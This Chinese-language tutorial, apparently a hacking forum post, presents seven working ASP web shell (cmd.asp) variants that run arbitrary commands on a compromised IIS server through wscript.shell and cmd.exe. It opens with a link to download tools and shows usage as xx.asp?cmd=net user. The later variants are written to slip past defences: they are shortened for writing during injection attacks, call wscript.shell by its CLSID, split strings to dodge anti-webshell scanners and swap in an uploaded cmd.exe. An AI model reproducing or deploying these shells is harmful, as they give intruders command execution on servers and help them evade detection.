工具下載地址:http://pan.baidu.com/s/1o6jxAgq
這里的asp后門不指像那些一句話木馬、砍客、冰狐、明小子之類的b/s型的,只指像cmd.asp或2005a.asp的。
第一個,來看zzzeva免fso的cmd.asp
代碼如下:<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request.form("cmd")).stdout.readall%>
</textarea>
是不是覺得有點長了?在黑客注入時寫有點不好寫。那來改一下。
第二個,更改zzzeva免fso的cmd.asp
代碼如下:
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request("cmd")).stdout.readall%>
用法是xx.asp?cmd=net user
這樣是為了得到結果排得方便,其實如果不為美觀,還可以更短,那來第三個
第三個,縮短的cmd.asp
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request("cmd")).stdout.readall%>
這里用了response.write,變量用了cmd。為什么不更短呢?
第四個,更短的cmd.asp
<%=server.createobject("wscript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>
好像這就是最短的了。除了短,我們還要在別的地方下功夫。
第五個,wscript.shell被改名怎么辦?
代碼:
<ObjEct runat=sErvEr iD=kk scOpE=pagE
classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>
當然,classid值在不同系統下有所不同。這個要自行更改
第六個,被一些殺asp木馬的軟件檢測出來怎么辦?
把變量拆開呀。代碼:
<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>
或
<%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>
這里代碼引號里的東東都可以隨便拆的,像還可以拆成
<%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c
"&request("c")).stdout.readall%>
第7個,cmd.exe不讓調用怎么辦?
這個你自己上傳一個cmd.exe,放在一個可以調用的目錄下,代碼更改如下:
<%=server.createobject("wscript.shell").exec("e:aspxcmD.EXE /c
"&request("c")).stdout.readall%>